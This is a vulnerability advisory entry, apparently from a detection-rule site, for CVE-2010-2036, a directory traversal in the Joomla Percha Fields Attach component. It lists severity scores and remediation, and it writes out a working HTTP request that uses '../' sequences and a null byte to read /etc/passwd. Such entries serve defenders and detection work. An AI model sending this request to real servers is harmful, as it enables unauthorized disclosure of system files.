🔙 목록으로 돌아가기

CVE-2010-2036: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal

TitleJoomla! Component Percha Fields Attach 1.0 - Directory Traversal
Authordaffainfo
SeverityHigh
ImpactAn attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score7.5
EPSS Score0.00598
CVE IDCVE-2010-2036
CWE IDCWE-22
Tags cve cve2010 lfi joomla edb packetstorm percha vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.

🌐 HTTP Request

GET /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-2036.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-2036.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A